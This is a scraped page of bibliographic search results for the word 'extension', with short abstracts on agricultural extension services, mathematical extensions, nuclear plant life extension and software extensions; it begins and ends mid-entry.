Subsequent components detect higher moment departures from the null hypothesis of equal treatment effects 4. Web Extensible Display Manager Energy Technology Data Exchange (ETDEWEB) Slominski, Ryan [Thomas Jefferson National Accelerator Facility (TJNAF), Newport News, VA (United States); Larrieu, Theodore L. [Thomas Jefferson National Accelerator Facility (TJNAF), Newport News, VA (United States) 2018-02-01 Jefferson Lab's Web Extensible Display Manager (WEDM) allows staff to access EDM control system screens from a web browser in remote offices and from mobile devices. Native browser technologies are leveraged to avoid installing and managing software on remote clients such as browser plugins, tunnel applications, or an EDM environment. Since standard network ports are used firewall exceptions are minimized. To avoid security concerns from remote users modifying a control system, WEDM exposes read-only access and basic web authentication can be used to further restrict access. Updates of monitored EPICS channels are delivered via a Web Socket using a web gateway. The software translates EDM description files (denoted with the edl suffix) to HTML with Scalable Vector Graphics (SVG) following the EDM's edl file vector drawing rules to create faithful screen renderings. The WEDM server parses edl files and creates the HTML equivalent in real-time allowing existing screens to work without modification. Alternatively, the familiar drag and drop EDM screen creation tool can be used to create optimized screens sized specifically for smart phones and then rendered by WEDM. 5. Extensions panach\\'ees autoduales OpenAIRE Bertrand, Daniel 2010-01-01 We study self-duality of Grothendieck's blended extensions (extensions panach\\'ees) in the context of a tannakian category. The set of equivalence classes of symmetric, resp. antisymmetric, blended extensions is naturally endowed with a torsor structure, which enables us to compute the unipotent radical of the associated monodromy groups in various situations 6. Robotic hand with modular extensions Science.gov (United States) Salisbury, Curt Michael; Quigley, Morgan 2015-01-20 A robotic device is described herein. The robotic device includes a frame that comprises a plurality of receiving regions that are configured to receive a respective plurality of modular robotic extensions. The modular robotic extensions are removably attachable to the frame at the respective receiving regions by way of respective mechanical fuses. Each mechanical fuse is configured to trip when a respective modular robotic extension experiences a predefined load condition, such that the respective modular robotic extension detaches from the frame when the load condition is met. 7. Think - Baltic Extension / Kalle Kask Index Scriptorium Estoniae 2002-01-01 Tallinna TÜ Rehabilitatsiooni tehnoloogia keskus korraldas pressikonverentsi, kus tutvustati osalemist EL V raamprogrammis Think - Baltic Extension, mis on suunatud puuetega inimeste tööhõive tagamisele 8. EXTENSION WORKERS' OPINIONS REGARDING THE ... African Journals Online (AJOL) The primary purpose of the study was to determine extension worker's opinions regarding the influence of the National Maize Competition (NAMCOM) on the farmers' agricultural practices and experiences in the Manzini region. A census population of front-line extension workers in charge of the participating areas in ... 9. 
Journal of Agricultural Extension: Submissions African Journals Online (AJOL) Publication Ethics Articles published in the Journal of Agricultural Extension must be relevant to extension practice and should not have been published or under ... COI involves using your position as an author, editor, or reviewer to promote your interests (business or financial), or those of your external relationships (family ... 10. Quotient semigroups and extension semigroups the viewpoint of C∗-algebra and apply them to a survey of extension semigroups. Cer- tain interrelations ... -algebra extension theory and K K-theory, it is crucial to study the theory of quotient semigroups from the ... Similar to the construction of quotient group and quotient linear space, quotient semi- group may be induced ... 11. Repeat Customer Success in Extension Science.gov (United States) Bess, Melissa M.; Traub, Sarah M. 2013-01-01 Four multi-session research-based programs were offered by two Extension specialist in one rural Missouri county. Eleven participants who came to multiple Extension programs could be called "repeat customers." Based on the total number of participants for all four programs, 25% could be deemed as repeat customers. Repeat customers had… 12. Hom-associative Ore extensions Science.gov (United States) Bäck, P.; Richter, J.; Silvestrov, S. 2018-02-01 We introduce hom-associative Ore extensions as non-associative, non-unital Ore extensions with a hom-associative multiplication, as well as give some necessary and sufficient conditions when such exist. Within this framework, we also construct a family of hom-associative Weyl algebras as generalizations of the classical analogue, and prove that they are simple. African Journals Online (AJOL) i Training extension staff and farmers . ..ii Producing fry for satellite centres at the regions and for fish fanners; and iii Conducting experiments on fish production, productivity and water quality. Restructuring of Agricultural Research and Extension services. The organisation ofUganda's national agricultural research. 14. Frames and extension problems I DEFF Research Database (Denmark) Christensen, Ole 2014-01-01 In this article we present a short survey of frame theory in Hilbert spaces. We discuss Gabor frames and wavelet frames and set the stage for a discussion of various extension principles; this will be presented in the article Frames and extension problems II (joint with H.O. Kim and R.Y. Kim).... 15. Extension and the Practicing Veterinarian Science.gov (United States) Meyerholz, G. W. 1974-01-01 In order for Extension programs of veterinary medicine to succeed, good relationships are needed among university veterinarians, practicing local veterinarians, county Extension agents and the clientele. This author attempts to define some roles and relationships and offer some suggestions for the improvement of relationships to increase… 16. Programming Reactive Extensions and LINQ CERN Document Server Liberty, Jesse 2011-01-01 Pro Reactive Extensions and LINQ is a deep dive into the next important technology for .NET developers: Reactive Extensions. This in-depth tutorial goes beyond what is available anywhere else to teach how to write WPF, Silverlight, and Windows Phone applications using the Reactive Extensions (Rx) to handle events and asynchronous method calls. Reactive programming allows you to turn those aspects of your code that are currently imperative into something much more event-driven and flexible. 
For this reason, it's sometimes referred to as LINQ for Events. Reactive programming hinges on the concep 17. Learning Joomla! 3 extension development CERN Document Server Plummer, Tim 2013-01-01 A practical guide with step-by-step examples that build on each other so you can learn by doing and get hands-on knowledge about creating your plugins, modules, and components in Joomla.""Learning Joomla! 3 Extension Development, Third Edition"" is for developers who want to create their own Joomla extensions. It is assumed you will have some basic PHP, HTML, and CSS knowledge, but you don't need any prior Joomla programming experience. This book will also be useful to people who just want to make minor customizations to existing Joomla extensions and build on the work of others in the open so 18. Extensions of the Standard Model CERN Document Server Zwirner, Fabio 1996-01-01 Rapporteur talk at the International Europhysics Conference on High Energy Physics, Brussels (Belgium), July 27-August 2, 1995. This talk begins with a brief general introduction to the extensions of the Standard Model, reviewing the ideology of effective field theories and its practical implications. The central part deals with candidate extensions near the Fermi scale, focusing on some phenomenological aspects of the Minimal Supersymmetric Standard Model. The final part discusses some possible low-energy implications of further extensions near the Planck scale, namely superstring theories. 19. BWR operation for life extension International Nuclear Information System (INIS) Stancavage, P. 1987-01-01 Most nuclear power plant life extension studies conducted to date focus on the technology, licensing, and economics of extended service life. The most significant factor in plant longevity, however, is proper operation and maintenance. This paper highlights the benefits of boiling water reactor (BWR) operation for life extension and discusses specific recommendations that will enhance the prospects for safe, reliable, and economic power production in the long term. The benefits of BWR operation for life extension include a lower cost of electric energy production, increased capacity and availability factors, a lower forced outage rate, and reduced occupational exposure to radiation. Operating experience and advanced in technology have provided a wealth of knowledge that can be used to develop specific recommendations for adding years to the expected life of BWR plants. This paper discusses key factors in operation for life extension 20. Extension agents and conflict narratives DEFF Research Database (Denmark) Bond, Jennifer Lauren 2016-01-01 conflict. Originality: This work contributes to a growing body of literature interested in the role of extension agents in conflict management. By applying Q methodology, this work has shown that while extension agents are involved in conflict management, their perceptions of these conflicts are subjective......Purpose: This work investigated the narratives of development extensionists in relation to natural resource conflict, in order to understand the competing discourses surrounding the wicked problems of natural resource management in Laikipia County, Kenya. Methodology: Q methodology was used...... to elicit the conflict narratives present among extension professionals. A concourse of 221 statements were devised from interviews and group discussions with key informants and a final sample of 49 statements was used for the sorting. 
Thirteen Q-sorts were undertaken with among rural extension... 1. Boiler-turbine life extension Energy Technology Data Exchange (ETDEWEB) Natzkov, S. [TOTEMA, Ltd., Sofia (Bulgaria); Nikolov, M. [CERB, Sofia (Bulgaria) 1995-12-01 The design life of the main power equipment-boilers and turbines is about 105 working hours. The possibilities for life extension are after normatively regulated control tests. The diagnostics and methodology for Boilers and Turbines Elements Remaining Life Assessment using up to date computer programs, destructive and nondestructive control of metal of key elements of units equipment, metal creep and low cycle fatigue calculations. As well as data for most common damages and some technical decisions for elements life extension are presented. 2. Agricultural extension and mass media. Science.gov (United States) Perraton, H 1983-12-01 To learn more about the use of the mass media for agricultural extension, the World Bank has considered the efforts of 2 units: INADES-formation in West Africa and the Extension Aids Branch of Malawi. The INADES-formation study focuses on Cameroon but also considers work in Rwanda and the Ivory Coast. Some general conclusions emerge from a comparison of the 2 organizations. Malawi operates an extension service which reaches farmers through extension agents, through farmer training centers, and through mass media. The Extension Aids Branch (EAB) has responsibility for its media work and broadcasts 4 1/2 hours of radio each week. Its 6 regular radio programs include a general program which interviews farmers, a music request program in which the music is interspersed with farming advice, a farming family serial, and a daily broadcast of agricultural news and information. The 17 cinema vans show some agricultural films, made by EAB, some entertainment films, and some government information films from departments other than the ministry of agriculture. EAB also has a well-developed program of research and evaluation of its own work. INADES-formation, the training section of INADES, works towards social and economic development of the population. It teaches peasant farmers and extension agents and does this through running face-to-face seminars, by publishing a magazine, "Agripromo," and through correspondence courses. In 1978-79 INADES-formation enrolled some 4500 farmers and extension agents as students. Both of these organizations work to teach farmers better agriculture techniques, and both were created in response to the fact that agricultural extension agents cannot meet all the farmers in their area. Despite the similarity of objective, there are differences in methods and philosophy. The EAB works in a single country and uses a variety of mass media, with print playing a minor role. INADES-formation is an international and nongovernmental organization and its 3. Extension Agents\\' Commitment To Extension Work In Abia And ... African Journals Online (AJOL) A structured and validated inventory scale titled: “Job Commitment Inventory Scale” was administered to 89 and 61 respondents randomly selected from a population of 112 and 117 extension agents in Abia and Rivers States ADPs. respectively. The data collected were analyzed using descriptive statistical tools such as ... 4. verbal extensions: valency decreasing extensions in the basà ... African Journals Online (AJOL) Finance London: Hodder. Education. Imoh, P.M., 2013. Verbal extensions: Valency increasing operations in Basà verbal system. 
Paper presented at the West African Languages Congress (WALC) and 26th Annual. Conference of the Linguistic Association of Nigeria (26th CLAN), 29th July to 2nd August. 2013, University of Ibadan, ... 5. NDE and plant life extension International Nuclear Information System (INIS) Liu, S.N.; Ammirato, F.V.; Nottingham, L.D. 1991-01-01 Component life extension is the process of making run-repair-replace decisions for plant components and includes a thorough analysis of the capability of the component to perform throughout the projected lifetime. For many critical plant components, nondestructive evaluation (NDE) is essential in determining whether the component can be operated safely and economically in the extended life period and to help utilities determine safe and economic inspection intervals. NDE technology is required for not only detecting defects that could grow to a size of concern during extended lifetimes, but also will be called upon to measure and monitor accumulating material degradation that strongly affects component reliability. This paper discusses the role of NDE in life extension by reviewing three examples--a reactor pressure vessel, steam turbine-generator rotors, and generator retaining rings. In each example, the contribution of NDE to life extension decisions is described. (author) 6. Extension properties of states on operator algebras Science.gov (United States) Hamhalter, Jan 1995-08-01 We summarize and deepen some recent results concerning the extension problem for states on operator algebras and general quantum logics. In particular, we establish equivalence between the Gleason extension property, the Hahn-Banach extension property, and the universal state extension property of projection logics. Extensions of Jauch-Piron states are investigated. 7. Extension Resources for International Trade Science.gov (United States) Seal, Susan D. 2016-01-01 With the opening of additional trade partnerships, the reduction of global transportation and communication costs, and the increase in demand for U.S. agricultural products and services, international trade is an area of great importance to more and more Extension clients and stakeholders. This article provides information about the primary… 8. Invertible extensions and growth conditions Czech Academy of Sciences Publication Activity Database 2004-01-01 Roč. 339, - (2004), s. 21-26 ISSN 1631-073X R&D Projects: GA ČR GA201/03/0041; GA AV ČR KSK1019101 Institutional research plan: CEZ:AV0Z1019905 Keywords : invertible extensions * growth conditions Subject RIV: BA - General Mathematics Impact factor: 0.284, year: 2004 9. African Journal of Livestock Extension African Journals Online (AJOL) African Journal of Livestock Extension aims to bring to the fore the role and significance of livestock in maintaining rural, peri-urban and urban households, vis-à-vis its impact on poverty alleviation, household nutritional status, economic coping strategy and provision of employment. The focus of the journal relates to all ... 10. Managing Diversity within Cooperative Extension. Science.gov (United States) Ewert, D. Merrill; Rice, Jennifer A. King 1994-01-01 Six focus groups analyzed findings of a literature review on cultural diversity's effects on productivity and effectiveness. Action steps for Cooperative Extension were outlined: implementing affirmative action, valuing diversity, managing diversity, creating new management structures, and establishing a more supportive environment. (SK) 11. 
intensive and extensive feeding regimes African Journals Online (AJOL) production and reproduction parameters in ram lambs, under intensive and extensive feeding regimes. J.P.C. Greyling* and G.J. Taylor. Department of Animal Science, University of the Orange Free State, PO. Box 339, Bloemfontein,. 9300, South Africa. Received revised 1 July 1999; accepted 28 July 1999. Forty Dorper ... 12. Extensions of the standard model International Nuclear Information System (INIS) Ramond, P. 1983-01-01 In these lectures we focus on several issues that arise in theoretical extensions of the standard model. First we describe the kinds of fermions that can be added to the standard model without affecting known phenomenology. We focus in particular on three types: the vector-like completion of the existing fermions as would be predicted by a Kaluza-Klein type theory, which we find cannot be realistically achieved without some chiral symmetry; fermions which are vector-like by themselves, such as do appear in supersymmetric extensions, and finally anomaly-free chiral sets of fermions. We note that a chiral symmetry, such as the Peccei-Quinn symmetry can be used to produce a vector-like theory which, at scales less than M/sub W/, appears to be chiral. Next, we turn to the analysis of the second hierarchy problem which arises in Grand Unified extensions of the standard model, and plays a crucial role in proton decay of supersymmetric extensions. We review the known mechanisms for avoiding this problem and present a new one which seems to lead to the (family) triplication of the gauge group. Finally, this being a summer school, we present a list of homework problems. 44 references 13. Extensiveness of Farmers' Buying Process NARCIS (Netherlands) Kool, M.; Meulenberg, M.T.G.; Broens, D.F. 1997-01-01 In this article we study farmers' buying processes, in particular the selection of a supplier for a given farm input. Extensiveness of farmers' buying processes is defined as the degree information acquisition and alternative evaluation effort carried out to prepare that selection. Hypotheses, 14. Journal of Agricultural Extension submitted to Agricultural Extension ... African Journals Online (AJOL) followed by lack of contact with extension agents (71.7%) and gender discrimination in obtaining land on lease for farming (39.2). Majority (65.8%) of .... The study area was Osun State, a tropical state in South west; Nigeria lying within coordinates 7. 0. 30ʹN and 4. 030ʹE. The state comprised of 30 Local Government ... 15. Linear programming foundations and extensions CERN Document Server Vanderbei, Robert J 2001-01-01 Linear Programming: Foundations and Extensions is an introduction to the field of optimization. The book emphasizes constrained optimization, beginning with a substantial treatment of linear programming, and proceeding to convex analysis, network flows, integer programming, quadratic programming, and convex optimization. The book is carefully written. Specific examples and concrete algorithms precede more abstract topics. Topics are clearly developed with a large number of numerical examples worked out in detail. Moreover, Linear Programming: Foundations and Extensions underscores the purpose of optimization: to solve practical problems on a computer. 
Accordingly, the book is coordinated with free efficient C programs that implement the major algorithms studied: -The two-phase simplex method; -The primal-dual simplex method; -The path-following interior-point method; -The homogeneous self-dual methods. In addition, there are online JAVA applets that illustrate various pivot rules and variants of the simplex m... 16. Managing BWR plant life extension International Nuclear Information System (INIS) Ianni, P.W.; Kiss, E. 1985-01-01 Recent studies have confirmed that extending the useful life of a large nuclear plant can be justified with very high cost benefit ratio. In turn, experience with large power plant systems and equipment has shown that a well-integrated and -managed plan is essential in order to achieve potential economic benefits. Consequently, General Electric's efforts have been directed at establishing a life extension plan that considers alternative options and cost-effective steps that can be taken in early life, those appropriate during middle life, and those required in late life. This paper briefly describes an approach designed to provide the plant owner a maximum of flexibility in developing a life extension plan 17. Extensive Reading and Learning Style OpenAIRE Kawachi, Tomoko; 河内, 智子 2015-01-01 Extensive reading (ER) has been shown to be an effective approach to both improving students’ language skills and nurturing positive attitudes toward language reading and learning. However, although the approach has proven to be effective for many learners, as with any teaching approach, it does not seem to work equally well for all learners. The current study hypothesized that learning style might be a factor influencing learners’ achievement in and attitude toward ER, and investigated the r... 18. Rosacea with extensive extrafacial lesions OpenAIRE Pereira, TM; Vieira, AP; Sousa-Basto, A 2008-01-01 Rosacea is a very common skin disorder in the clinical practice that primarily affects the convex areas of the face. Extrafacial rosacea lesions have occasionally been described, but extensive involvement is exceptional. In the absence of its typical clinical or histological features, the diagnosis of extrafacial rosacea may be problematic. We describe an unusual case of rosacea with very exuberant extrafacial lesions, when compared with the limited involvement of the face. 19. Recall in extensive form games OpenAIRE Klaus Ritzberger 1999-01-01 This paper considers characterizations of perfect recall in extensive form games. It is shown that perfect recall can be expressed in terms of choices without any reference to infomation sets. When information sets are taken into account, it is decomposable into an ordering of information sets and that players do not forget what they knew nor what they did. Thus, if information sets are partially ordered, then perfect recall is implied by the player's inability to refine her information from ... 20. Journal of Agricultural Extension: Editorial Policies African Journals Online (AJOL) Mission Statement: The mission of the Journal of Agricultural Extension is to publish conceptual papers and empirical research that tests, extends, or builds ... research and methodological issues; nutrition extension; extension youth programme; women-in-agriculture; extension, Climate Change and the environment, ICT, ... 1. Professional development and extension programs International Nuclear Information System (INIS) Bereznai, G. 
2015-01-01 Professional Development (PD) refers to the means by which people acquire, develop, maintain and enhance the specialist knowledge and skills needed to practice in their profession. Extension Programs (aka Continuing Education) are offered by most post-secondary degree/diploma/certificate granting institutions.The courses are typically taken on a part-time basis, and course delivery often includes distance learning technology. An important implementation of PD is via workplace training, industry specific seminars, workshops and non-credit courses offered by a wide range of service providers. 2. Coal Combustion Products Extension Program Energy Technology Data Exchange (ETDEWEB) Tarunjit S. Butalia; William E. Wolfe 2006-01-11 This final project report presents the activities and accomplishments of the ''Coal Combustion Products Extension Program'' conducted at The Ohio State University from August 1, 2000 to June 30, 2005 to advance the beneficial uses of coal combustion products (CCPs) in highway and construction, mine reclamation, agricultural, and manufacturing sectors. The objective of this technology transfer/research program at The Ohio State University was to promote the increased use of Ohio CCPs (fly ash, FGD material, bottom ash, and boiler slag) in applications that are technically sound, environmentally benign, and commercially competitive. The project objective was accomplished by housing the CCP Extension Program within The Ohio State University College of Engineering with support from the university Extension Service and The Ohio State University Research Foundation. Dr. Tarunjit S. Butalia, an internationally reputed CCP expert and registered professional engineer, was the program coordinator. The program coordinator acted as liaison among CCP stakeholders in the state, produced information sheets, provided expertise in the field to those who desired it, sponsored and co-sponsored seminars, meetings, and speaking at these events, and generally worked to promote knowledge about the productive and proper application of CCPs as useful raw materials. The major accomplishments of the program were: (1) Increase in FGD material utilization rate from 8% in 1997 to more than 20% in 2005, and an increase in overall CCP utilization rate of 21% in 1997 to just under 30% in 2005 for the State of Ohio. (2) Recognition as a ''voice of trust'' among Ohio and national CCP stakeholders (particularly regulatory agencies). (3) Establishment of a national and international reputation, especially for the use of FGD materials and fly ash in construction applications. It is recommended that to increase Ohio's CCP utilization rate from 30% in 2005 to 3. JESS: Java extensible snakes system Science.gov (United States) McInerney, Tim; Akhavan Sharif, M. Reza; Pashotanizadeh, Nasrin 2005-04-01 Snakes (Active Contour Models) are powerful model-based image segmentation tools. Although researchers have proven them especially useful in medical image analysis over the past decade, Snakes have remained primarily in the academic world and they have not become widely used in clinical practice or widely available in commercial packages. A number of confusing and specialized variants exist and there has been no standard open-source implementation available. To address this problem, we present a Java Extensible Snakes System (JESS) that is general, portable, and extensible. The system uses Java Swing classes to allow for the rapid development of custom graphical user interfaces (GUI's). 
It also incorporates the Java Advanced Imaging(JAI) class library, which provide custom image preprocessing, image display and general image I/O. The Snakes algorithm itself is written in a hierarchical fashion, consisting of a general Snake class and several subclasses that span the main variants of Snakes including a new, powerful, robust subdivision-curve Snake. These subclasses can be easily and quickly extended and customized for any specific segmentation and analysis task. We demonstrate the utility of these classes for segmenting various anatomical structures from 2D medical images. We also demonstrate the effectiveness of JESS by using it to rapidly build a prototype semi-automatic sperm analysis system. The JESS software will be made publicly available in early 2005. 4. Fluorescein-related extensive jaundice. Science.gov (United States) Kalkan, Asim; Turedi, Suleyman; Aydin, Ibrahim 2015-03-01 Fluorescein is a chemical dye frequently used in eye diseases to assess blood flow in the retina, choroid tissue, and iris. Although it has many known adverse effects, it has not previously been reported to lead to jaundice. The purpose of this case report was to emphasize that for patients presenting at the emergency department with jaundice symptoms, it should not be forgotten by emergency physicians that jaundice can develop after fluorescein angiography. Case: A 65-year-old woman presented at the emergency department with extensive jaundice that had developed on her entire body a few hours after fluorescein angiography applied because of vision impairment. The test results for all the diseases considered to cause jaundice were normal,and fluorescein-related jaundice was diagnosed. Conclusion: A detailed anamnesis should be taken when jaundice is seen in patients who have undergone fluorescein angiography, and it should not be forgotten that fluorescein dye is a rare cause of jaundice. 5. Extensive Renovation of Heritage Buildings DEFF Research Database (Denmark) Rasmussen, Torben Valdbjørn; Møller, Eva B.; Buch-Hansen, Thomas Cornelius 2015-01-01 In the debate on whether or not heritage buildings should be included in work to mitigate climate change impacts, it is important to assess the impact of these buildings. Therefore the results of an extensive energy upgrading of a listed complex was studied. Climate change and measures to mitigate...... existing, older and heritage buildings. However, heritage buildings possess heritage values that need to be protected while on the other hand the buildings need to remain part of the attractive building stock, as many of these buildings will otherwise deteriorate. Based on an example, this paper identifies...... feasible energy-upgrading measures for implementation including measures to provide an acceptable indoor climate. The energy savings as well as the reduction of CO2 emissions are calculated. Furthermore, it is discussed how measures can affect the durability of a heritage building, as measures may create... 6. An Expressive Extension of TLC DEFF Research Database (Denmark) Henriksen, Jesper Gulmann 2002-01-01 A temporal logic of causality (TLC) was introduced by Alur, Penczek and Peled in [1]. It is basically a linear time temporal logic interpreted over Mazurkiewicz traces which allows quantification over causal chains. Through this device one can directly formulate causality properties of distributed...... systems. In this paper we consider an extension of TLC by strengthening the chain quantification operators. 
We show that our logic TLC* adds to the expressive power of TLC. We do so by defining an Ehrenfeucht-Fraïssé game to capture the expressive power of TLC. We then exhibit a property and by means...... of this game prove that the chosen property is not definable in TLC. We then show that the same property is definable in TLC*. We prove in fact the stronger result that TLC* is expressively stronger than TLC exactly when the dependency relation associated with the underlying trace alphabet is not transitive.... 7. Industrial extension, the Oklahoma way Science.gov (United States) Farrell, Edmund J. 1994-03-01 Oklahoma has established a customer-driven industrial extension system. A publicly-chartered, private non-profit corporation, the Oklahoma Alliance for Manufacturing Excellence, Inc. (the Alliance') coordinates the system. The system incorporates principles that Oklahoma manufacturers value: (1) decentralization and local accessibility; (2) coordinated existing resources; (3) comprehensive help; (4) interfirm cooperation; (5) pro-active outreach; (6) self- help and commitment from firms; (7) customer governance; and (8) performance accountability. The Oklahoma system consists of: (1) a network of locally-based broker/agents who work directly with manufacturers to diagnose problems and find appropriate assistance; (2) a group of industry sector specialists who collect and disseminate sector specific technological and market intelligence to the broker/agents and their clients; (3) all the specialized public and private sector resources coordinated by the system; and (4) a customer- driven coordination and evaluation mechanism, the Alliance. 8. Competency Modeling in Extension Education: Integrating an Academic Extension Education Model with an Extension Human Resource Management Model Science.gov (United States) Scheer, Scott D.; Cochran, Graham R.; Harder, Amy; Place, Nick T. 2011-01-01 The purpose of this study was to compare and contrast an academic extension education model with an Extension human resource management model. The academic model of 19 competencies was similar across the 22 competencies of the Extension human resource management model. There were seven unique competencies for the human resource management model.… 9. Extension contact and professional competencies needed by ... African Journals Online (AJOL) Extension contact and professional competencies needed by extension agents in the Central Region of Ghana for effective transfer of fish-processing technologies to small-scale women in fish processing - Provisional Communication. 10. Strengthening Agricultural Research Capacity for Viable Extension ... African Journals Online (AJOL) Strengthening Agricultural Research Capacity for Viable Extension Policies in Nigeria: An Exploration of Ricoeur's Hermeneutic Theory for Analysing Extension Research. ... Progressively more, researchers use hermeneutic philosophy to inform the conduct of interpretive research. Analogy between the philosophical ... 11. Livestock extension programmes participation and impact on ... African Journals Online (AJOL) Livestock extension programmes participation and impact on smallholder cattle productivity in Kwazulu-Natal: A propensity score matching approach. ... The study concludes with some policy implications. Keywords: Agricultural Extension, Cattle production, Impact evaluation, Propensity Score Matching, South Africa. 12. 
Extensions of cutting problems: setups Directory of Open Access Journals (Sweden) Sebastian Henn 2013-08-01 Full Text Available Even though the body of literature in the area of cutting and packing is growing rapidly, research seems to focus on standard problems in the first place, while practical aspects are less frequently dealt with. This is particularly true for setup processes which arise in industrial cutting processes whenever a new cutting pattern is started (i.e. a pattern is different from its predecessor and the cutting equipment has to be prepared in order to meet the technological requirements of the new pattern. Setups involve the consumption of resources and the loss of production time capacity. Therefore, consequences of this kind must explicitly be taken into account for the planning and control of industrial cutting processes. This results in extensions to traditional models which will be reviewed here. We show how setups can be represented in such models, and we report on the algorithms which have been suggested for the determination of solutions of the respective models. We discuss the value of these approaches and finally point out potential directions of future research. 13. Presentation Extensions of the SOAP Science.gov (United States) Carnright, Robert; Stodden, David; Coggi, John 2009-01-01 A set of extensions of the Satellite Orbit Analysis Program (SOAP) enables simultaneous and/or sequential presentation of information from multiple sources. SOAP is used in the aerospace community as a means of collaborative visualization and analysis of data on planned spacecraft missions. The following definitions of terms also describe the display modalities of SOAP as now extended: In SOAP terminology, View signifies an animated three-dimensional (3D) scene, two-dimensional still image, plot of numerical data, or any other visible display derived from a computational simulation or other data source; a) "Viewport" signifies a rectangular portion of a computer-display window containing a view; b) "Palette" signifies a collection of one or more viewports configured for simultaneous (split-screen) display in the same window; c) "Slide" signifies a palette with a beginning and ending time and an animation time step; and d) "Presentation" signifies a prescribed sequence of slides. For example, multiple 3D views from different locations can be crafted for simultaneous display and combined with numerical plots and other representations of data for both qualitative and quantitative analysis. The resulting sets of views can be temporally sequenced to convey visual impressions of a sequence of events for a planned mission. 14. Logic regression and its extensions. Science.gov (United States) Schwender, Holger; Ruczinski, Ingo 2010-01-01 Logic regression is an adaptive classification and regression procedure, initially developed to reveal interacting single nucleotide polymorphisms (SNPs) in genetic association studies. In general, this approach can be used in any setting with binary predictors, when the interaction of these covariates is of primary interest. Logic regression searches for Boolean (logic) combinations of binary variables that best explain the variability in the outcome variable, and thus, reveals variables and interactions that are associated with the response and/or have predictive capabilities. 
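The logic regression abstract continues below; as a toy illustration of the kind of search it describes (not the authors' simulated-annealing implementation), the following sketch exhaustively scores depth-2 Boolean combinations of binary predictors against a binary outcome. The data, the agreement score and the variable names are invented for illustration.

```python
import itertools
import numpy as np

rng = np.random.default_rng(0)

# Toy data: 8 binary predictors (e.g. SNP indicators); the outcome follows
# the Boolean rule (X1 AND X3) OR X6, with 10% label noise.
n, p = 500, 8
X = rng.integers(0, 2, size=(n, p))
signal = (X[:, 1] & X[:, 3]) | X[:, 6]
y = np.where(rng.random(n) < 0.9, signal, 1 - signal)

def agreement(feature, y):
    """Fraction of outcomes matched by a single Boolean feature."""
    return float(np.mean(feature == y))

# Exhaustive search over depth-2 logic expressions: Xi, Xi AND Xj, Xi OR Xj.
candidates = {f"X{i}": X[:, i] for i in range(p)}
for i, j in itertools.combinations(range(p), 2):
    candidates[f"X{i} AND X{j}"] = X[:, i] & X[:, j]
    candidates[f"X{i} OR X{j}"] = X[:, i] | X[:, j]

best = max(candidates, key=lambda name: agreement(candidates[name], y))
print(best, round(agreement(candidates[best], y), 3))  # recovers part of the rule
```

Full logic regression replaces this exhaustive scan with a stochastic search over deeper logic trees and scores them inside a regression model, as the abstract goes on to explain.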
The logic expressions are embedded in a generalized linear regression framework, and thus, logic regression can handle a variety of outcome types, such as binary responses in case-control studies, numeric responses, and time-to-event data. In this chapter, we provide an introduction to the logic regression methodology, list some applications in public health and medicine, and summarize some of the direct extensions and modifications of logic regression that have been proposed in the literature. Copyright © 2010 Elsevier Inc. All rights reserved. 15. Effectiveness Of Communication Outreach Strategies Of Extension ... African Journals Online (AJOL) Communication is a major component of agricultural extension and extension agents utilize various methods to deliver messages to their clienteles. The paper focused on the effectiveness of communication outreach strategies of extension agents in Imo State, Nigeria. Data for the study was collected with the aid of ... 16. Towards a National Educational Extension Service. Science.gov (United States) Lessinger, Leon M. 1994-01-01 Describes major elements of an extension system for education based on those essential for one in agriculture, as exemplified by the U.S. Department of Agriculture Cooperative Extension Service. Like the agricultural system, an educational extension service would be driven by customer needs, employ county agents to facilitate client/service… 17. User contributions and public extension delivery modes ... African Journals Online (AJOL) The high recurrent costs faced by the public extension service constraint the number of visits farmers receive. This study examined a number of extension communication channels through which farmers received farm management services/information from the public extension agent. The idea was, first, to find out the ... 18. Purdue Extension: Employee Engagement and Leadership Style Science.gov (United States) Abbott, Angela R. 2017-01-01 The purpose of this quantitative study was to assess the Purdue Extension county directors' level of engagement and leadership style and to examine the relationship between these two variables. The study aimed to inform a professional development training program for all Purdue Extension county extension directors. Survey data were collected from… 19. Norm Attaining Arens Extensions on ℓ1 Directory of Open Access Journals (Sweden) Javier Falcó 2014-01-01 Full Text Available We study norm attaining properties of the Arens extensions of multilinear forms defined on Banach spaces. Among other related results, we construct a multilinear form on ℓ1 with the property that only some fixed Arens extensions determined a priori attain their norms. We also study when multilinear forms can be approximated by ones with the property that only some of their Arens extensions attain their norms. 20. Control and Modeling of Extensible Continuum Robots Data.gov (United States) National Aeronautics and Space Administration — The goal of this research is to develop fundamental control theory, dynamic modeling, and control technology for extensible continuum robotic manipulators. These... 1. Strengthening Agricultural Research Capacity for Viable Extension African Journals Online (AJOL) under discussion. It is suggested that, in conjunction with Gadamer's hermeneutic of understanding, Ricoeur's theory of interpretation warrants consideration as a method of textual analysis by extension experts in Nigeria. Key words: Ricoeur Hermeneutics, textual analysis, extension. Introduction. 
There is increasing interest ... 2. Towards professionalism in agricultural extension: The professional ... African Journals Online (AJOL) Towards professionalism in agricultural extension: The professional registration of Extensionists in South Africa – A dream or a reality? The role of the South African Society of Extensionists in South Africa – A dream or a reality? The role of the South African Society of Agricultural Extension (SASAE) 3. An Effective Aquaculture Extension System from Farmers ... African Journals Online (AJOL) Government and projects extension professionals should support the system through technical training, study tours, publications and networking. Likewise, since educated and well-off farmers in peri-urban areas can access information, government offices should be equipped with well-trained extension personnel and ... 4. Forestry Extension: An Indispensable Service for Sustainable ... African Journals Online (AJOL) It is effective forestry extension that can enlighten and educate the forest communities on the inherent dangers their activities pose to the enviroment.This is the premise on which the challenges facing effective forestry extension delivery in Nigeria and suggested solutions to the highlighted challenges is the focus of this write ... 5. assessment of extension agents' communication methods African Journals Online (AJOL) USER ABSTRACT. The need to improve aquaculture production through enhanced technology transfer necessitated this study to assess extension agents' use of communication methods and its impact on linkage. A structured questionnaire was administered to 44 extension agents who were randomly selected from Lagos State ... 6. Introduction To Natural Resources Management Extension System ... African Journals Online (AJOL) Introduction To Natural Resources Management Extension System (Nrmes); Rethinking In Extension Systems For 21st Century. ... Growing food demands, soil nutrient depletion is occurring in many tropical and subtropical countries, and land degradation and desertification continues to progress in many other countries. 7. CANONICAL EXTENSIONS OF SYMMETRIC LINEAR RELATIONS NARCIS (Netherlands) Sandovici, Adrian; Davidson, KR; Gaspar, D; Stratila, S; Timotin, D; Vasilescu, FH 2006-01-01 The concept of canonical extension of Hermitian operators has been recently introduced by A. Kuzhel. This paper deals with a generalization of this notion to the case of symmetric linear relations. Namely, canonical regular extensions of symmetric linear relations in Hilbert spaces are studied. The 8. 7 CFR 15b.27 - 